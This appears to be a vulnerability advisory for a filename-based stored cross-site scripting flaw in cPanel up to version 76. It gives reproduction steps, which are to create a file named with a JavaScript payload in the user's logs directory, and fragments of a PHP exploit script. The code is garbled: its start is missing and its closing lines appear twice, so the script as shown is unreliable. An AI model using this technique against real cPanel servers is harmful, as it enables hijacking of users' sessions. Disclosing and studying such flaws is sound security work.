[+] Title: cPanel Filename Based Stored XSS <= v76
[+] Author: Numan OZDEMIR
[+] Vendor Homepage: cpanel.com
[+] Version: Up to v76.
[+] Discovered by Numan OZDEMIR in InfinitumIT Labs
[+] root@numanozdemir.com - info@infinitumit.com.tr
[~] Description:
Attacker can run JavaScript codes on this page:
http://ip:2082/cpsessXXXXXXXXXX/frontend/THEME/raw/index.html
[~] How to Reproduce:
Create a file as named with your payload in /home/user/logs directory
or run this php exploit:
http://ip:2082/cpsessXXXXXXXXXX/frontend/THEME/raw/index.html
');
}else{
die('An error occured.');
}
}else{
echo 'Enter your payload:
';
}
// end of the script.
?>
Note: You cant create a file as named with / (slash) character by this
exploit.
This vulnerability is disclosed by cPanel Team's confirmation.
// for secure days...
http://ip:2082/cpsessXXXXXXXXXX/frontend/THEME/raw/index.html
');
}else{
die('An error occured.');
}
}else{
echo 'Enter your payload:
';
}
// end of the script.
?>